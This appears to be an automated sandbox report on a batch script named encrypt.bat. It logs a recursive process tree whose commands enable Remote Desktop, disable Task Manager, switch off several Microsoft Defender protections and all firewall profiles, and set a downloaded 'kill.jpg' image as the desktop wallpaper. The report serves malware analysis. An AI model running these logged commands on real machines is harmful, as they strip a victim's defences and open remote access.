C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4792 /prefetch:24⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f12⤵
- Sets desktop wallpaper using registry
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f10⤵
- Sets desktop wallpaper using registry
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f8⤵
- Sets desktop wallpaper using registry
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f6⤵
- Sets desktop wallpaper using registry
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f4⤵
- Sets desktop wallpaper using registry
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Encrypt\encrypt.batFilesize
2KB
MD5d4b8e7c1b0ee37229b53d8d3c7348af0
SHA13467311b4001a759e24b72cf8ec7606219d4c1cc
SHA256f9f88ccdb3900863a2747809a9e4fe3acd4f52387c2b8e47eebe40bcce5d3fe1
SHA512fe5bab00cf03784b34475d5bfdd29bd625d12137f6b3a96afa9435833fef639e33e4e5357c772fac829232cea20a9ebd81435d4621173722d04846ee915e2863
-
C:\Encrypt\encrypt.htmlFilesize
1KB
MD560722a327960e4b4f5d967101a72ed06
SHA104109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA2563441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
